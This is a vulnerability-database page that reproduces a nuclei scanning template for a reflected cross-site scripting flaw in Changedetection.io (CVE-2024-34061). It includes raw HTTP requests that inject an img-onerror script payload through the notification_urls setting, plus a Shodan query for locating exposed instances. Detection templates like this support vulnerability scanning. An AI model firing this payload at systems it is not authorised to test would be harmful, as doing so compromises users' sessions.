Lucene search
K

Changedetection.io <=v0.45.21 - Cross-Site Scripting

🗓️ 07 Jul 2026 03:01:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 44 Views

Changedetection.io v0.45.21 XSS vulnerabilit

Related
Refs
Code
id: CVE-2024-34061

info:
  name: Changedetection.io <=v0.45.21 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    Changedetection.io is a free open source web page change detection, website watcher, restock monitor and notification service. In affected versions Input in parameter notification_urls is not processed resulting in javascript execution in the application. A reflected XSS vulnerability happens when the user input from a URL or POST data is reflected on the page without being stored, thus allowing the attacker to inject malicious content. This issue has been addressed in version 0.45.22. Users are advised to upgrade. There are no known workarounds for this vulnerability.
  impact: |
    Attackers can inject malicious scripts via the notification_urls parameter, potentially compromising user sessions.
  remediation: |
    Update Changedetection.io to version 0.45.22 or later.
  reference:
    - https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-pwgc-w4x9-gw67
    - https://nvd.nist.gov/vuln/detail/CVE-2024-34061
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
    cvss-score: 4.3
    cve-id: CVE-2024-34061
    cwe-id: CWE-79
    epss-score: 0.01281
    epss-percentile: 0.66546
  metadata:
    verified: true
    max-request: 2
    shodan-query: html:"Change Detection"
  tags: cve,cve2024,changedetection,xss,vuln

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /settings HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        csrf_token={{csrf_token}}&requests-time_between_check-weeks=&requests-time_between_check-days=&requests-time_between_check-hours=3&requests-time_between_check-minutes=&requests-time_between_check-seconds=&requests-jitter_seconds=0&application-filter_failure_notification_threshold_attempts=6&application-password=&application-base_url=&application-notification_urls=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&application-notification_title=ChangeDetection.io+Notification+-+%7B%7Bwatch_url%7D%7D&application-notification_body=%7B%7Bwatch_url%7D%7D+had+a+change.%0D%0A---%0D%0A%7B%7Bdiff%7D%7D%0D%0A---%0D%0A&application-notification_format=Text&application-fetch_backend=html_requests&application-webdriver_delay=&application-ignore_whitespace=y&application-global_subtractive_selectors=&application-global_ignore_text=&application-api_access_token_enabled=y&requests-extra_proxies-0-proxy_name=&requests-extra_proxies-0-proxy_url=&requests-extra_proxies-1-proxy_name=&requests-extra_proxies-1-proxy_url=&requests-extra_proxies-2-proxy_name=&requests-extra_proxies-2-proxy_url=&requests-extra_proxies-3-proxy_name=&requests-extra_proxies-3-proxy_url=&requests-extra_proxies-4-proxy_name=&requests-extra_proxies-4-proxy_url=&save_button=Save

    skip-variables-check: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<img src=x onerror=alert(document.domain)>'
          - 'is not a valid AppRise URL'
        condition: and

      - type: word
        part: header
        words:
          - 'text/html'

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body
        name: csrf_token
        group: 1
        regex:
          - 'name="csrf_token" value="([^"]+)"'
        internal: true
# digest: 4b0a004830460221009820f8c94f3096d65176b9295f673302810b0996efdbb2c3f84d443e3641cd92022100bbe84121c41fba6a4ba3a1bd3c1d3010161cdf1acd17f64752a3f487f262deb0:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.1Medium risk
Vulners AI Score6.1
CVSS 3.14.3
EPSS0.01281
SSVC
44